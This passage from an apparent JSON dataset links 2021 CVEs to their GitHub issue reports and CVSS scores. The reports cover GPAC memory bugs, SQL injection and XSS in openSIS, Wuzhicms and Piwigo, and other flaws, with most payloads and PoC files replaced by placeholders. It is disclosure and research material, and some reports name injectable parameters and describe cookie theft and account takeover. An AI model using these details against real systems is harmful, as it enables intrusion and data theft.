  71014. "description": "Segmentation fault caused by double free using mp4box in gf_free, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ It seems that the pointer has been free previously in configfile.c ~~~~ APITAG ~~~~",
  71015. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71016. "severity": "MEDIUM",
  71017. "baseScore": 5.5,
  71018. "impactScore": 3.6,
  71019. "exploitabilityScore": 1.8
  71020. },
  71021. {
  71022. "CVE_ID": "CVE-2021-40572",
  71023. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1893",
  71024. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1893",
  71025. "Repo_new": "gpac/gpac",
  71026. "Issue_Created_At": "2021-08-25T07:18:42Z",
  71027. "description": "Segmentation fault caused by double free using mp4box in a NUMBERTAG dmx_finalize, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f2da NUMBERTAG in _int_free NUMBERTAG f NUMBERTAG af7 in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG e3d4d in a NUMBERTAG dmx_finalize (filter=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in gf_fs_del (fsess=fsess APITAG at PATHTAG NUMBERTAG c1a NUMBERTAG a in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71028. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71029. "severity": "MEDIUM",
  71030. "baseScore": 5.5,
  71031. "impactScore": 3.6,
  71032. "exploitabilityScore": 1.8
  71033. },
  71034. {
  71035. "CVE_ID": "CVE-2021-40573",
  71036. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1891",
  71037. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1891",
  71038. "Repo_new": "gpac/gpac",
  71039. "Issue_Created_At": "2021-08-25T06:44:03Z",
  71040. "description": "System abort caused by double free using mp4box. FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71041. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71042. "severity": "MEDIUM",
  71043. "baseScore": 5.5,
  71044. "impactScore": 3.6,
  71045. "exploitabilityScore": 1.8
  71046. },
  71047. {
  71048. "CVE_ID": "CVE-2021-40576",
  71049. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1904",
  71050. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1904",
  71051. "Repo_new": "gpac/gpac",
  71052. "Issue_Created_At": "2021-08-31T12:13:57Z",
  71053. "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_isom_get_payt_count, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG ab4f NUMBERTAG in gf_isom_get_payt_count APITAG APITAG at PATHTAG NUMBERTAG in APITAG (file=file APITAG APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG full_dump=GF_FALSE) at PATHTAG NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71054. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71055. "severity": "MEDIUM",
  71056. "baseScore": 5.5,
  71057. "impactScore": 3.6,
  71058. "exploitabilityScore": 1.8
  71059. },
  71060. {
  71061. "CVE_ID": "CVE-2021-40592",
  71062. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1876",
  71063. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1876",
  71064. "Repo_new": "gpac/gpac",
  71065. "Issue_Created_At": "2021-08-16T09:08:59Z",
  71066. "description": "Infinite Loop in APITAG Hi. There is an infinite loop bug in APITAG to reproduce, follow the command below with the attachment file. APITAG FILETAG Credit : APITAG of Venustech",
  71067. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71068. "severity": "MEDIUM",
  71069. "baseScore": 5.5,
  71070. "impactScore": 3.6,
  71071. "exploitabilityScore": 1.8
  71072. },
  71073. {
  71074. "CVE_ID": "CVE-2021-40606",
  71075. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1885",
  71076. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1885",
  71077. "Repo_new": "gpac/gpac",
  71078. "Issue_Created_At": "2021-08-24T02:45:45Z",
  71079. "description": "Bug: Memcpy from unknown addrees. It's a memcpy from unknown addrees bug. Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code in bitstream.c: CODETAG FILETAG",
  71080. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71081. "severity": "MEDIUM",
  71082. "baseScore": 5.5,
  71083. "impactScore": 3.6,
  71084. "exploitabilityScore": 1.8
  71085. },
  71086. {
  71087. "CVE_ID": "CVE-2021-40607",
  71088. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1879",
  71089. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1879",
  71090. "Repo_new": "gpac/gpac",
  71091. "Issue_Created_At": "2021-08-19T02:52:37Z",
  71092. "description": "heap buffer overflow in schm_box_size. It's a heap buffer overflow bug caused by missing NUMBERTAG check of the end of URI. Step to reproduce NUMBERTAG get latest commit code APITAG GPAC version NUMBERTAG DEV re NUMBERTAG gbbd NUMBERTAG e master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: CODETAG FILETAG",
  71093. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71094. "severity": "MEDIUM",
  71095. "baseScore": 5.5,
  71096. "impactScore": 3.6,
  71097. "exploitabilityScore": 1.8
  71098. },
  71099. {
  71100. "CVE_ID": "CVE-2021-40608",
  71101. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1883",
  71102. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1883",
  71103. "Repo_new": "gpac/gpac",
  71104. "Issue_Created_At": "2021-08-20T05:15:45Z",
  71105. "description": "BUG : free on unknown addrees. It's a pointer free on unknown addrees bug caused by freeing a uninitialized pointer. Step to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with enable sanitizer NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: in APITAG CODETAG It is supposed to init t NUMBERTAG g in APITAG but in APITAG it might forget that mission. CODETAG FILETAG",
  71106. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71107. "severity": "MEDIUM",
  71108. "baseScore": 5.5,
  71109. "impactScore": 3.6,
  71110. "exploitabilityScore": 1.8
  71111. },
  71112. {
  71113. "CVE_ID": "CVE-2021-40610",
  71114. "Issue_Url_old": "https://github.com/blackQvQ/emlog/issues/1",
  71115. "Issue_Url_new": "https://github.com/blackqvq/emlog/issues/1",
  71116. "Repo_new": "blackqvq/emlog",
  71117. "Issue_Created_At": "2021-09-01T07:31:56Z",
  71118. "description": "emlog pro NUMBERTAG management XSS Vulnerability. \u5728\u540e\u53f0\u7ba1\u7406\u7684\u5199\u6587\u7ae0\u6709\u4e24\u4e2a\u53ef\u5199\u5165xss \u6587\u7ae0\u6807\u9898 FILETAG \u9700\u8981\u8bc4\u8bba\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u4e00\u4e2a\u5728\u524d\u53f0\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u7cfb\u7edf\u8bbe\u7f6e\u7684\u9996\u9875\u4f4e\u90e8\u4fe1\u606f FILETAG FILETAG",
  71119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71120. "severity": "MEDIUM",
  71121. "baseScore": 5.4,
  71122. "impactScore": 2.7,
  71123. "exploitabilityScore": 2.3
  71124. },
  71125. {
  71126. "CVE_ID": "CVE-2021-40616",
  71127. "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/722",
  71128. "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/722",
  71129. "Repo_new": "thinkcmf/thinkcmf",
  71130. "Issue_Created_At": "2021-09-01T09:17:18Z",
  71131. "description": "thinkcmf NUMBERTAG unauthorized vulnerability. thinkcmf NUMBERTAG found an unauthorized vulnerability. The attacker can modify the password of the administrator account with id NUMBERTAG through the background user management group permissions. The use condition is that the background user management group authority is required. By default, the password of the administrator account with id NUMBERTAG cannot be modified. Vulnerable PATHTAG FILETAG Browser access PATHTAG the password of the administrator account with id NUMBERTAG FILETAG",
  71132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  71133. "severity": "MEDIUM",
  71134. "baseScore": 6.5,
  71135. "impactScore": 3.6,
  71136. "exploitabilityScore": 2.8
  71137. },
  71138. {
  71139. "CVE_ID": "CVE-2021-40617",
  71140. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/192",
  71141. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/192",
  71142. "Repo_new": "os4ed/opensis-classic",
  71143. "Issue_Created_At": "2021-09-01T12:17:31Z",
  71144. "description": "SQL Injection in APITAG . Hi MENTIONTAG , I found a sql injection vulnerability in APITAG function. I can inject special character in URL to escape SQL query in backend because of lacking of sanitize user input. APITAG APITAG Bug: ERRORTAG In line NUMBERTAG the code does not sanitize param u , in order that, I can escape the SQL query easily. Solution: Use function APITAG before assign APITAG to username param. The code look like: APITAG",
  71145. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71146. "severity": "CRITICAL",
  71147. "baseScore": 9.8,
  71148. "impactScore": 5.9,
  71149. "exploitabilityScore": 3.9
  71150. },
  71151. {
  71152. "CVE_ID": "CVE-2021-40618",
  71153. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/193",
  71154. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/193",
  71155. "Repo_new": "os4ed/opensis-classic",
  71156. "Issue_Created_At": "2021-09-01T12:48:52Z",
  71157. "description": "SQL Injection in file FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data, attacker can injection malicious sql into query by control parameters such as APITAG , APITAG or APITAG , APITAG in file APITAG . Request ERRORTAG Response CODETAG APITAG FILETAG",
  71158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71159. "severity": "CRITICAL",
  71160. "baseScore": 9.8,
  71161. "impactScore": 5.9,
  71162. "exploitabilityScore": 3.9
  71163. },
  71164. {
  71165. "CVE_ID": "CVE-2021-40635",
  71166. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/195",
  71167. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/195",
  71168. "Repo_new": "os4ed/opensis-classic",
  71169. "Issue_Created_At": "2021-09-01T15:52:40Z",
  71170. "description": "SQL Injection in id Parameter. Author: CP0 ERRORTAG NUMBERTAG K from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Due to no security mechanism was implemented in parameter id , attacker can inject arbitrary SQL query and extract database informations FILETAG Vulnerable code section FILETAG FILETAG FILETAG FILETAG Request and Response APITAG GET APITAG + &table_name=courses HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate X Requested With: APITAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG HTTP NUMBERTAG OK Date: Wed NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Length NUMBERTAG Connection: close Content Type: text/html course_modal_request|| APITAG NUMBERTAG courses were found. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Reading APITAG APITAG APITAG APITAG APITAG APITAG Writing APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  71171. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71172. "severity": "HIGH",
  71173. "baseScore": 7.5,
  71174. "impactScore": 3.6,
  71175. "exploitabilityScore": 3.9
  71176. },
  71177. {
  71178. "CVE_ID": "CVE-2021-40636",
  71179. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/198",
  71180. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/198",
  71181. "Repo_new": "os4ed/opensis-classic",
  71182. "Issue_Created_At": "2021-09-05T08:05:52Z",
  71183. "description": "XSS and Error based SQL injection in FILETAG . Due to lack of protection, parameters APITAG , APITAG , id , APITAG can be abused to injection SQL queries to extract information from databases some other SQLi tricks, parameter msg can be used to inject XSS payload and steal user's cookie (and even takeover user's account) FILETAG As we can see, no security mechanism was implemented which resulted in a lot of vulnerabilities. Exploiting FILETAG Injection point : APITAG In beneath, I've presented how information can be extracted via SQL injection. XSS can be exploited by giving the correct information in other parameters and inject Javascript code in APITAG , msg . Request: APITAG GET APITAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Vary: Accept Encoding Content Encoding: gzip Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/htmlx APITAG Solution Add security functions such as APITAG to sanitize parameters before processing or printing out to the screen. For XSS, use htmlentities to properly encode the output.",
  71184. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71185. "severity": "HIGH",
  71186. "baseScore": 7.5,
  71187. "impactScore": 3.6,
  71188. "exploitabilityScore": 3.9
  71189. },
  71190. {
  71191. "CVE_ID": "CVE-2021-40637",
  71192. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/199",
  71193. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/199",
  71194. "Repo_new": "os4ed/opensis-classic",
  71195. "Issue_Created_At": "2021-09-05T10:01:03Z",
  71196. "description": "Reflected XSS in FILETAG . Description By injecting Javascript code, an attacker can steal the user's cookie and takeover the user's account. This happened because of the lack of security implementation for type parameter. Exploitation FILETAG Injection point: APITAG Request: APITAG GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Connection: keep alive Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG Response: APITAG HTTP NUMBERTAG OK Date: Sun NUMBERTAG Sep NUMBERTAG GMT Server: Apache NUMBERTAG APITAG X Powered By: PHP NUMBERTAG ubuntu NUMBERTAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Content Length NUMBERTAG Keep Alive: timeout NUMBERTAG ma NUMBERTAG Connection: Keep Alive Content Type: text/html APITAG Solution: Before using any user's input, make sure to verify and sanitize it properly, trust nothing that's sent from the client. In the case of XSS, please consider using APITAG function to encode the user's input before printing it out to the user's screen",
  71197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  71198. "severity": "MEDIUM",
  71199. "baseScore": 6.1,
  71200. "impactScore": 2.7,
  71201. "exploitabilityScore": 2.8
  71202. },
  71203. {
  71204. "CVE_ID": "CVE-2021-40639",
  71205. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/27",
  71206. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/27",
  71207. "Repo_new": "jflyfox/jfinal_cms",
  71208. "Issue_Created_At": "2021-09-02T10:25:19Z",
  71209. "description": "File reading. You can read any file in the web directory, including the database configuration file And all files in the root directory poc: FILETAG APITAG FILETAG",
  71210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  71211. "severity": "HIGH",
  71212. "baseScore": 7.5,
  71213. "impactScore": 3.6,
  71214. "exploitabilityScore": 3.9
  71215. },
  71216. {
  71217. "CVE_ID": "CVE-2021-40656",
  71218. "Issue_Url_old": "https://github.com/libsixel/libsixel/issues/25",
  71219. "Issue_Url_new": "https://github.com/libsixel/libsixel/issues/25",
  71220. "Repo_new": "libsixel/libsixel",
  71221. "Issue_Created_At": "2021-09-03T03:34:45Z",
  71222. "description": "heap buffer overflow in PATHTAG Hi,I found a heap buffer overflow in the current master NUMBERTAG d NUMBERTAG URLTAG It sames with the PATHTAG NUMBERTAG URLTAG (I found this problem NUMBERTAG days ago) OS: Ubuntu NUMBERTAG LTS NUMBERTAG Kernel NUMBERTAG generic POC: FILETAG It's the command line's report: APITAG and here is the ASAN report for saitoha/libsixel URLTAG (the current master FILETAG In this position,[r NUMBERTAG rc NUMBERTAG will be APITAG => APITAG So,writing to data will cause overflow and then it writes to a location (chunk) in the heap that should not be written to. heap info: Before: CODETAG After: CODETAG",
  71223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  71224. "severity": "HIGH",
  71225. "baseScore": 8.8,
  71226. "impactScore": 5.9,
  71227. "exploitabilityScore": 2.8
  71228. },
  71229. {
  71230. "CVE_ID": "CVE-2021-40660",
  71231. "Issue_Url_old": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
  71232. "Issue_Url_new": "https://github.com/javadelight/delight-nashorn-sandbox/issues/117",
  71233. "Repo_new": "javadelight/delight-nashorn-sandbox",
  71234. "Issue_Created_At": "2021-08-30T01:48:26Z",
  71235. "description": "A APITAG vulnerability can be exploited after version NUMBERTAG There is a weak expression can be exploited to launch a DOS attack. FILETAG Execution stack is as follow: FILETAG POC: FILETAG Run result: FILETAG",
  71236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  71237. "severity": "HIGH",
  71238. "baseScore": 7.5,
  71239. "impactScore": 3.6,
  71240. "exploitabilityScore": 3.9
  71241. },
  71242. {
  71243. "CVE_ID": "CVE-2021-40663",
  71244. "Issue_Url_old": "https://github.com/janbialostok/deep-assign/issues/1",
  71245. "Issue_Url_new": "https://github.com/janbialostok/deep-assign/issues/1",
  71246. "Repo_new": "janbialostok/deep-assign",
  71247. "Issue_Created_At": "2021-09-06T04:52:21Z",
  71248. "description": "Prototype Pollution in APITAG npm package. \u270d\ufe0f Description APITAG URLTAG npm package is vulnerable to prototype pollution vulnerability prior to version NUMBERTAG Proof of Concept LIVE POC LINK URLTAG CODETAG \ud83d\udca5 Impact May lead to Information PATHTAG External References for similar vulnerabilities/blogs: URLTAG CVETAG",
  71249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71250. "severity": "CRITICAL",
  71251. "baseScore": 9.8,
  71252. "impactScore": 5.9,
  71253. "exploitabilityScore": 3.9
  71254. },
  71255. {
  71256. "CVE_ID": "CVE-2021-40669",
  71257. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/196",
  71258. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/196",
  71259. "Repo_new": "wuzhicms/wuzhicms",
  71260. "Issue_Created_At": "2021-09-05T14:05:26Z",
  71261. "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: APITAG ERRORTAG The APITAG parameter is controllable and the direct filtering of the APITAG parameter is not rigorous. POC ERRORTAG FILETAG FILETAG",
  71262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71263. "severity": "CRITICAL",
  71264. "baseScore": 9.8,
  71265. "impactScore": 5.9,
  71266. "exploitabilityScore": 3.9
  71267. },
  71268. {
  71269. "CVE_ID": "CVE-2021-40670",
  71270. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/197",
  71271. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/197",
  71272. "Repo_new": "wuzhicms/wuzhicms",
  71273. "Issue_Created_At": "2021-09-06T02:43:30Z",
  71274. "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: APITAG ERRORTAG In the APITAG file, the APITAG parameter and the APITAG parameter under the listing method are controllable, and the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG",
  71275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71276. "severity": "CRITICAL",
  71277. "baseScore": 9.8,
  71278. "impactScore": 5.9,
  71279. "exploitabilityScore": 3.9
  71280. },
  71281. {
  71282. "CVE_ID": "CVE-2021-40674",
  71283. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/198",
  71284. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/198",
  71285. "Repo_new": "wuzhicms/wuzhicms",
  71286. "Issue_Created_At": "2021-09-06T13:00:49Z",
  71287. "description": "There are NUMBERTAG SQL injections in Wuzhicms NUMBERTAG background. There are NUMBERTAG SQL injections in Wuzhicms NUMBERTAG background one Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG two The second SQL injection and the first SQL injection are in a different function in the same file! Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Vulnerability file: APITAG ERRORTAG Set APITAG and APITAG to be controllable. the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG three Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability Someone has submitted a SQL injection vulnerability in the file APITAG before ( URLTAG but I found that in addition to the APITAG parameter, it can be injected In addition, the APITAG parameter can also be injected! Vulnerability file: APITAG ERRORTAG Set APITAG NUMBERTAG and APITAG to be controllable. the APITAG parameter is not strictly filtered, causing SQL injection vulnerabilities! POC ERRORTAG FILETAG FILETAG",
  71288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  71289. "severity": "CRITICAL",
  71290. "baseScore": 9.8,
  71291. "impactScore": 5.9,
  71292. "exploitabilityScore": 3.9
  71293. },
  71294. {
  71295. "CVE_ID": "CVE-2021-40678",
  71296. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1476",
  71297. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1476",
  71298. "Repo_new": "piwigo/piwigo",
  71299. "Issue_Created_At": "2021-09-06T02:58:29Z",
  71300. "description": "Persistent Cross Site Scripting in Batch APITAG Description: In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross site scripting Vulnerable Instances: APITAG request ERRORTAG FILETAG suggestion Restrict user input and output",
  71301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71302. "severity": "MEDIUM",
  71303. "baseScore": 5.4,
  71304. "impactScore": 2.7,
  71305. "exploitabilityScore": 2.3
  71306. },
  71307. {
  71308. "CVE_ID": "CVE-2021-40812",
  71309. "Issue_Url_old": "https://github.com/libgd/libgd/issues/750",
  71310. "Issue_Url_new": "https://github.com/libgd/libgd/issues/750",
  71311. "Repo_new": "libgd/libgd",
  71312. "Issue_Created_At": "2021-09-05T05:18:46Z",
  71313. "description": "APITAG return value check. Hi, Two previous issues NUMBERTAG and NUMBERTAG show that a return value check for APITAG is necessary and it can cause read out of bound with a corrupted TGA file. APITAG is similar to APITAG and it also shows the error condition in its return value. some usages for APITAG are comparing return values to see any error occurred or not. (in FILETAG and FILETAG but there are some other call sites that do not check the return value and also the passed arguments are tainted and can be corrupted. this is the list of them: |file|function|line| | | | | |gd_webp.c| APITAG |gd_bmp.c | APITAG NUMBERTAG gd_bmp.c | APITAG NUMBERTAG APITAG so they need to add some condition check for APITAG . Regards.",
  71314. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71315. "severity": "MEDIUM",
  71316. "baseScore": 6.5,
  71317. "impactScore": 3.6,
  71318. "exploitabilityScore": 2.8
  71319. },
  71320. {
  71321. "CVE_ID": "CVE-2021-40881",
  71322. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/57",
  71323. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/57",
